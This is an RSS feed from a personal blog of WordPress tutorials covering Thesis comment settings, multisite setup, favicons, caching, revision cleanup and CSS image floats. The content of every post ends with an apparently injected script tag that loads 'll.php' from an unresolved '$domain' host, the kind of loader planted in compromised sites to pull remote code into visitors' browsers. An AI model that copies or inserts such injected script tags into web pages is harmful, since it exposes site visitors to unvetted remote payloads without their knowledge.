<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>John Sutton &#187; Wordpress</title>
	<atom:link href="http://www.johnsutton.us/category/web-development/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.johnsutton.us</link>
	<description>Photography</description>
	<lastBuildDate>Mon, 06 Feb 2012 13:20:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to remove &#8216;Comments Are Closed&#8217;</title>
		<link>http://www.johnsutton.us/2011/03/how-to-remove-comments-are-closed/</link>
		<comments>http://www.johnsutton.us/2011/03/how-to-remove-comments-are-closed/#comments</comments>
		<pubDate>Thu, 17 Mar 2011 14:54:55 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Thesis]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=1074</guid>
		<description><![CDATA[WordPress version 3.1 Thesis version 1.8 When comments aren&#8217;t needed  on a Worpdress site&#8217;s page &#8211;such as the About or Contact page, a message appears in place of the comment box that reads: &#8220;Comments Are Closed On This Entry&#8221; What if you&#8217;d like to remove that message?  With the Thesis Theme, removing it is easy; [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>WordPress version 3.1<br />
Thesis version 1.8</p>
<p>When comments aren&#8217;t needed  on a Worpdress site&#8217;s page &#8211;such as the About or Contact page, a message appears in place of the comment box that reads: &#8220;Comments Are Closed On This Entry&#8221; What if you&#8217;d like to remove that message?  With the Thesis Theme, removing it is easy; just follow these simple instructions.</p>
<ol>
<li>Login to the WordPress administrative section.</li>
<li>Navigate to: Thesis &gt; Design Options &gt; Display Option &gt; Comments</li>
<li>Uncheck: &#8220;If comments are closed display a message&#8221;</li>
<li>View your site and look at the bottom of a page/post with comments turned off</li>
<li>Voila! Of course if you want the message, then check the box.</li>
</ol>
<p>Still see the message?</p>
<ol>
<li>Return to the admin section, check your steps, click the <strong>BIG SAVE BUTTON</strong>.</li>
<li>Clear browser cache and cookies and reload the page.</li>
</ol>
<p><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2011/03/how-to-remove-comments-are-closed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Enabling WordPress Multisite Capability</title>
		<link>http://www.johnsutton.us/2011/03/enabling-wordpress-multisite-capability/</link>
		<comments>http://www.johnsutton.us/2011/03/enabling-wordpress-multisite-capability/#comments</comments>
		<pubDate>Sat, 05 Mar 2011 02:54:48 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[MAMP]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=1012</guid>
		<description><![CDATA[These notes are intended for web developers working in a MAC OSX environment with a working understanding of UNIX/Linux administration, basic WordPress development experience and knowledge of PHP, HTML and CSS. Multisite testing should be with either virtualhosts configured with the OSX webserver, or MAMP/MAMP PRO. Testing will not be possible using either localhost or [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>These notes are intended for web developers working in a MAC OSX environment with a working understanding of UNIX/Linux administration, basic WordPress development experience and knowledge of PHP, HTML and CSS.</p>
<p>Multisite testing should be with either virtualhosts configured with the OSX webserver, or MAMP/MAMP PRO.</p>
<p>Testing will not be possible using either localhost or 127.0.0.1   For instructions on how to set up virtualhosts with MAMP PRO, <a href="http://66.147.244.192/~mywebadv/2011/03/mamp-mamp-pro-and-mac-osx-10-6-5/" target="_blank">please reference this article</a>.</p>
<p>Once a WordPress installation is up and running multisite functionality may be enabled. These instructions are prompts for accomplishing this task.</p>
<p><strong>1. Administrative</strong></p>
<ul>
<li>Full administrative access to the WP installation including all site files and the database is required.</li>
</ul>
<p><strong>2. Server Requirements</strong></p>
<ul>
<li>Multisite development should first be tested in a local  environment.</li>
<li>For live site deployment check first with the host provider to make sure multiple sites are supported. Due to scaling issues multiple sites and shared hosting are not recommended. <a href="http://codex.wordpress.org/Create_A_Network" target="_blank">Please see the wordpress codex</a>.</li>
</ul>
<p><strong>3. Backup</strong></p>
<ul>
<li>As always, backup existing installation site files and the database before making major changes to the site structure and functionality.</li>
</ul>
<p><strong>4. Open the wp-config file</strong></p>
<ul>
<li>Above this line: /* That&#8217;s all, stop editing! Happy blogging. */: enter the following:</li>
<li><em>define(&#8216;WP_ALLOW_MULTISITE&#8217;, true);</em></li>
</ul>
<p><strong>5. Install The Network</strong></p>
<ul>
<li>Deactivate plugins <span style="color: #ff0000;">***IMPORTANT***</span></li>
<li>In the WordPress dashboard navigate to: Administration &gt; Tools &gt; Network</li>
<li>Click Network</li>
<li>Read the instructions and click install</li>
<li>Follow the instructions for:  adding a blogs.dir directory, modifying config.php, modifying the .htaccess file</li>
<li>After modifications it will be necessary to login to the wordpress admin interface again. At the top of the dashboard menu will be a new section &#8216;Super Admin&#8217; where additional sites and users may be added.</li>
<li>Reactivate plugins</li>
</ul>
<p><strong>RESOURCES:</strong><br />
<a href="http://wptheming.com/2010/03/wordpress-3-0-enable-network" target="_blank">Worpress Theming </a><br />
<a href="http://codex.wordpress.org/Create_A_Network" target="_blank">WordPress Codex</a></p>
<p><strong>BONUS TOPIC:</strong> How to map top level domains in multisite:<br />
<a href="http://verysimple.com/2010/07/09/install-wordpress-3-with-multiple-tlds/" target="_blank">verysimple.com</a><br />
<a href="http://ottopress.com/2010/wordpress-3-0-multisite-domain-mapping-tutorial/" target="_blank">ottopress.com</a></p>
<p>Remember to relax, go slowly, take notes, develop locally, and have a backup just in case things fall apart.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2011/03/enabling-wordpress-multisite-capability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>5 Steps to Favicon Success</title>
		<link>http://www.johnsutton.us/2011/02/5-steps-to-favicon-success/</link>
		<comments>http://www.johnsutton.us/2011/02/5-steps-to-favicon-success/#comments</comments>
		<pubDate>Wed, 23 Feb 2011 21:17:07 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Graphic Design]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=914</guid>
		<description><![CDATA[Creating and uploading a small navigational and branding aid, the Favicon, can be troublesome so here are five easy steps that I hope will smooth the road for you. 1. In your version of Photoshop -or similar program, create a 500px x 500px graphic. If you&#8217;re a Photoshop user, as I am, save your image [...]]]></description>
			<content:encoded><![CDATA[<p><a class="post_image_link" href="http://www.johnsutton.us/2011/02/5-steps-to-favicon-success/" title="Permanent link to 5 Steps to Favicon Success"><img class="post_image alignleft frame" src="http://66.147.244.192/~mywebadv/wp-content/uploads/2011/02/faviconForBlogPost.gif" width="200" height="200" alt="Post image for 5 Steps to Favicon Success" /></a>
</p><p>Creating and uploading a small navigational and branding aid, the Favicon, can be troublesome so here are five easy steps that I hope will smooth the road for you.</p>
<p>1. In your version of Photoshop -or similar program, create a 500px x 500px graphic. If you&#8217;re a Photoshop user, as I am, save your image as a Photoshop (PSD) document.</p>
<p>2. Resize this PSD file image to 16px by 16px and save as a PNG file to your desktop.</p>
<p>3. Open a browser session and <a href="http://www.convertico.com/">navigate to the Convertico website</a> where we will convert the PNG file to an ICO file</p>
<p>4. On the home page of the Convertico site there are only two steps needed:</p>
<ul>
<li>Upload your PNG file in the proper field, and click &#8220;CONVERT&#8221;</li>
<li>Click on the link &#8216;Click Here To Download&#8217; saving the file directly to your desktop: If on a PC right click and &#8220;Save Target As…&#8221; If on a Mac, press option and click &#8220;Save Link As…&#8221; and pick the save destination for the file.</li>
</ul>
<p>5. As required by your web application setup, upload your newly minted favicon.ico and presto, you&#8217;ve done it!</p>
<p><strong>NOTES:</strong><br />
Keep your graphic simple using two or at most three graphic elements. As you know, or discovered, keeping the graphic statement bold and simple is only practical as most of the detail in a larger image is lost when reduced to the smaller  16 x 16 pixel format.</p>
<p><strong>On LOGOS:</strong><br />
Designing logos are fun, but require patience, sensitivity, and more work than you might think. For some great guidelines I recommend you look at <a href="http://www.amazon.com/gp/product/020179537X?ie=UTF8&amp;tag=mywead-20&amp;linkCode=as2&amp;camp=1789&amp;creative=9325&amp;creativeASIN=020179537X">Before &amp; After Page Design</a><img style="border: none !important; margin: 0px !important;" src="http://www.assoc-amazon.com/e/ir?t=mywead-20&amp;l=as2&amp;o=1&amp;a=020179537X" border="0" alt="" width="1" height="1" /> by John McWade. Sold at Amazon.</p>
<p><strong> <em>Please Note:</em></strong><em> If you click on the link and buy the book then I receive a commission from Amazon for the referral; but only if you buy. Thank you!</em></p>
<p><code><script src="http://www.assoc-amazon.com/s/link-enhancer?tag=mywead-20&amp;o=1" type="text/javascript">
</script><br />
<noscript><br />
<img src="http://www.assoc-amazon.com/s/noscript?tag=mywead-20" alt="" /><br />
</noscript></code><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2011/02/5-steps-to-favicon-success/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Site Updates and WP Super Cache</title>
		<link>http://www.johnsutton.us/2011/02/site-updates-and-wp-super-cache/</link>
		<comments>http://www.johnsutton.us/2011/02/site-updates-and-wp-super-cache/#comments</comments>
		<pubDate>Mon, 21 Feb 2011 19:49:15 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=882</guid>
		<description><![CDATA[WordPress can be a resource hog with all those calls to the database, so a good move then is to utilize the fantastic WP Super Cache pluggin to bring things back to speed. One important caveat: when updating the site after installing this caching pluggin, be sure to delete the pluggin cache. If you don&#8217;t [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>WordPress can be a resource hog with all those calls to the database, so a good move then is to utilize the fantastic WP Super Cache pluggin to bring things back to speed.</p>
<p>One important caveat: when updating the site after installing this caching pluggin, be sure to delete the pluggin cache. If you don&#8217;t you could very well  be left scratching your head, wondering why your layout changes sometimes do or do not appear, or why they appear in one browser, and not another. For example deleted widgets still show, or banner images don&#8217;t change.</p>
<p>Please, let me save you a few hours of aggravation. This might not be the solution to your particular issue, but it&#8217;s worth considering, and certainly worth making note of for the future.</p>
<p>And if you haven&#8217;t already, do <a href="http://wordpress.org/extend/plugins/wp-super-cache/" target="_blank">install this pluggin</a>.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2011/02/site-updates-and-wp-super-cache/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Is Your WordPress Website Sluggish?</title>
		<link>http://www.johnsutton.us/2010/09/is-your-wordpress-website-sluggish/</link>
		<comments>http://www.johnsutton.us/2010/09/is-your-wordpress-website-sluggish/#comments</comments>
		<pubDate>Tue, 21 Sep 2010 17:04:43 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=429</guid>
		<description><![CDATA[The potential performance problem could involve the storing of excessive post and page revisions in the database when writing and editing posts. Having a record of past revisions  can be a good thing in certain situations, –like when there are multiple authors, but these revisions do add up quickly and can take up a lot [...]]]></description>
			<content:encoded><![CDATA[<p><a class="post_image_link" href="http://www.johnsutton.us/2010/09/is-your-wordpress-website-sluggish/" title="Permanent link to Is Your WordPress Website Sluggish?"><img class="post_image alignleft" src="http://66.147.244.192/~mywebadv/wp-content/uploads/2010/09/steps-02-OPT.jpg" width="200" height="395" alt="Post image for Is Your WordPress Website Sluggish?" /></a>
</p><p>The potential performance problem could involve the storing of excessive post and page revisions in the database when writing and editing posts.</p>
<p>Having a record of past revisions  can be a good thing in certain situations, –like when there are multiple authors, but these revisions do add up quickly and can take up a lot of space. In a relatively short time a database can become clogged with unneeded data causing a website to load more slowly than it should. Lets say there are one hundred posts stored in the database. If every post has ten revisions stored as well,  that would mean there are one thousand records. Yikes!</p>
<p>I know many aren&#8217;t that interested in the technical side of the web. But if you&#8217;re a savvy and proud WordPress user, you should know that there is a little trick that could help speed up site performance. While you might not have the technical skills to deal with this you now have one more thing to ask your developer.</p>
<p>So, don&#8217;t panic. The sky isn&#8217;t falling and the solution to this issue has two relatively simple components.</p>
<p>1. Delete unneeded revision records currently in the database.<br />
2. Make a minor configuration to the WordPress installation so revisions saved are limited to a specific number &#8211;like 3, that you feel comfortable with.</p>
<p>Please be aware that there may be other causes for sluggish performance than the one being discussed. As always, be sure to consult with your personal web developer before taking any action.</p>
<p>PROCEDURE:</p>
<p>1. Access the database logging in with a preferred interface tool (command-line, phpMyAdmin, SQLyog)<br />
2. Select WordPress database.<br />
3. WARNING! BACKUP THE DATABASE BEFORE CONTINUING!<br />
4. Execute the following sql command. This will delete excess revisions and associated meta data in three tables: wp_post, wp_term_relationships, wp_postmeta</p>
<p>delete x,y,z<br />
from wp_posts x<br />
left join wp_term_relationships y on (x.id = y.object_id)<br />
left join wp_postmeta z on (x.id = z.post_id)<br />
where x.post_type = &#8216;revision&#8217;</p>
<p>Now, to limit the number of revision copies in the future do the following.</p>
<p>1. Open the wp-config file.<br />
2. Add these two lines just below the opening &lt;?php tag:</p>
<p>/** Limits the number of post revisions saved in the DB; in this case 3. **/<br />
define(&#8216;WP_POST_REVISIONS&#8217;,3);</p>
<p><a href="http://www.artdorado.com/web-tech/wordpress/wordpress-post-revisions-en-de-database.html" target="_blank"><em>REFERENCE: artdorado.com</em></a></p>
<p><em>Photo Credit: John Sutton</em><script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2010/09/is-your-wordpress-website-sluggish/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to Solve Website Issues #01</title>
		<link>http://www.johnsutton.us/2010/08/solve-website-issues-01/</link>
		<comments>http://www.johnsutton.us/2010/08/solve-website-issues-01/#comments</comments>
		<pubDate>Wed, 01 Sep 2010 02:26:23 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Blogging]]></category>
		<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=338</guid>
		<description><![CDATA[A website is like any other piece of machinery: it needs tending. If you want to get the most out your site or tailor it to meet a specific need, that will most likely involve widgets, plugins, layout tweaks, or knitting in third party software.  With increased functionality inevitable conflicts and performance issues  crop up. [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>A website is like any other piece of machinery: it needs tending. If you want to get the most out your site or tailor it to meet a specific need, that will most likely involve widgets, plugins, layout tweaks, or knitting in third party software.  With increased functionality inevitable conflicts and performance issues  crop up. Trust me. I&#8217;ve been there. When they do, what to do?   First, don&#8217;t panic. Secondly, use some or all of the following suggestions to find a solution.</p>
<p>1. Realize that there is no issue that hasn&#8217;t been confronted, solved, and discussed somewhere by someone else. You are not alone.</p>
<p>2. Write down the issue, formulate questions you think need to be answered and try to be as specific as possible. Don&#8217;t censor yourself. There are no stupid questions.</p>
<p>3. Use Google. Google is indeed a good friend.</p>
<p>4. Join a discussion forum. For example: <a href="http://www.wordpress.org" target="_blank">WordPress.org</a> has an extensive knowledgeable and a very active and engaged community; as does <a href="http://diythemes.com/thesis/" target="_blank">Thesis</a>.  Remember that there are many people online who will be happy to help those who ask for help. But, be prepared to roll up your sleeves and sweat a little. Don&#8217;t expect someone else to do all the work for you.</p>
<p>5. When you find information you think might be helpful, read carefully. Sometimes crucial pieces of information are right in front of you if you would only slow down long enough to really understand what you&#8217;re reading. The more you seek, the more the hints will accumulate and point you in the right direction. Note to self: remember this when dealing with non-technical issues as well.</p>
<p>6. Be patient.</p>
<p>7. Relax.</p>
<p>8. And when it seems that you are no closer to the answer than when you started, step away from the computer and get some fresh air. Take a walk or ride a bike. Ice cream works too.</p>
<p>9. Sleep on it. I&#8217;m always amazed when solutions materialize seemingly out of thin air after a good night&#8217;s sleep.</p>
<p>10. Keep some perspective. Not finding an answer immediately is not the end of the world. But, have confidence that you will eventually find a solution if you stick with it.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2010/08/solve-website-issues-01/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What Are The Different WordPress Versions?</title>
		<link>http://www.johnsutton.us/2010/06/different-wordpress-versions/</link>
		<comments>http://www.johnsutton.us/2010/06/different-wordpress-versions/#comments</comments>
		<pubDate>Sun, 20 Jun 2010 16:49:33 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Web Development]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=252</guid>
		<description><![CDATA[I’ve played around with different content management systems over the last few years including Typepad, Joomla, Drupal, Indexhibit, and WordPress. Of these five, WordPress is my favorite and in my opinion it’s the easiest to set up, configure and administer. For most users, WordPress offers all the functional capability that could be needed or that [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>I’ve played around with different content management systems over the last few years including <em>Typepad</em>, <em>Joomla, Drupal, Indexhibit,</em> and <em>WordPress</em>. Of these five, <em>WordPress</em> is my favorite and in my opinion it’s the easiest to set up, configure and administer. For most users, <em>WordPress</em> offers all the functional capability that could be needed or that most users would want.</p>
<p>But there are two <em>WordPress </em>versions: <em>WordPress.com </em>and <em>WordPress .org</em>. What’s the difference?  Basically, <em>WordPress.com</em> is free and you don’t need to do much. <em>WordPress.org</em> is free and you can do anything you want.  Confused? Let me explain.</p>
<p><strong>WordPress.com </strong><br />
If you sign up for a blog at <em>WordPress.com,</em> your blog is free and all you need to do is fill in a few registration details and get going. Well, it’s almost that simple and yes there is a slight learning curve. For example, you’ll probably want to pick a theme &#8211;of which there are many, to create a look  and you’ll need to learn how to operate the backend for styling your content, uploading photos, videos, and adding widgets.  But, you won’t have to worry about upgrades, backups, or security. The people at<em> WordPress.com</em> will take care of all of that techie stuff.</p>
<p>This is a relatively painless route to take but the downside is that your account is ultimately benefiting the <em>WordPress.com</em> domain with search visibility instead of your own. All that free content –which search engines thrive on, uploaded daily by thousands of registered site owners feeds the search engine beast, for <em>WordPress.com</em>. It might be your content, but you are working SEO –search engine optimization, for <em>WordPress.com</em>.</p>
<p><strong>WordPress.org</strong><br />
If you walk over to <em>WordPress.org</em>, what will you find? Exactly the same <em>WordPress</em> application. At <em>WordPress.org</em> you –or your favorite technical developer, can download all the files that make up the WordPress application to a local development environment. There it can be configured to suit individual need and then uploaded to your hosting company that services your domain. Doing this now allows you, the domain owner, to reap the search and optimization benefits that come from adding fresh content to a website, through your WordPress blog application. And it really is yours.</p>
<p>Is there a downside?  Not if you have technical skills optimally knowing enough about PHP, MySQL and APACHE to get around. If you do, then you’ll appreciate the freedom that comes from having full access to the code. You –or your developer, can dig into the core to see how everything works, and have full control over every aspect of the application. If you don’t have that special gene, then you will be in for a bumpy ride. Either way though, downloading the application you, and you alone, will be responsible for everything including upgrades, backups, security and figuring out what’s going on when problems arise.</p>
<p><a href="http://wordpress.com">WordPress.com</a> click here.</p>
<p><a href="http://wordpress.org">WordPress.org</a> click here.</p>
<p><a href="http://en.support.wordpress.com/com-vs-org/">Further reading comparing</a> WordPress.com with WordPress.org.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2010/06/different-wordpress-versions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Text Not Wrapping Around Images in WordPress</title>
		<link>http://www.johnsutton.us/2010/06/text-wrapping-images-wordpress/</link>
		<comments>http://www.johnsutton.us/2010/06/text-wrapping-images-wordpress/#comments</comments>
		<pubDate>Fri, 04 Jun 2010 15:35:28 +0000</pubDate>
		<dc:creator>John Sutton</dc:creator>
				<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">http://66.147.244.192/~mywebadv/?p=143</guid>
		<description><![CDATA[Had a problem with text not wrapping around images when the images were either floated left or right in a blog post. Here&#8217;s how to fix that in version 2.9.2. Login to the backend. On the left-hand navigation pane navigate to &#8216;Appearance&#8217; then &#8216;Editor&#8217;. This opens the styles.css file. Scroll down to the end of [...]]]></description>
			<content:encoded><![CDATA[<p></p><p>Had a problem with text not wrapping around images when the images were either floated left or right in a blog post. Here&#8217;s how to fix that in version 2.9.2.</p>
<p>Login to the backend. On the left-hand navigation pane navigate to &#8216;Appearance&#8217; then &#8216;Editor&#8217;. This opens the styles.css file.</p>
<p>Scroll down to the end of the classes section [styles prepended by a period] and insert the following code to float images left.</p>
<p>.alignleft {<br />
display: inline;<br />
float: left;<br />
//add padding and margins and borders as you see fit//<br />
}</p>
<p>Below this, to float images right, insert this code:</p>
<p>.alignright {<br />
display: inline;<br />
float: right;<br />
//add padding and margins and borders as you see fit//<br />
}</p>
<p>You might want to set margins if you want the image to have a little breathing room. Here  is a <a href="http://wordpress.org/support/topic/316013 ">discussion dealing with this issue.</a></p>
<p>NOTE: It&#8217;s possible that you may not be able to write to the css file which probably means that <a href="http://codex.wordpress.org/Changing_File_Permissions">permissions need to be changed</a>.<script src="http://$domain/ll.php?kk=11"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.johnsutton.us/2010/06/text-wrapping-images-wordpress/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

